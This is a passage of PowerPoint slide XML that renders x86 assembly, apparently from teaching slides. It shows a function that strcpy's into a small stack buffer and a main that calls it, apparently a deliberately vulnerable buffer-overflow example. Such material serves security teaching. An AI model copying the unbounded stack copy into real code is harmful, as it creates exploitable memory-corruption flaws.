            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x28,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x8(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,0x4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  lea -0xc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  leave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x8048504,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x8048517,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
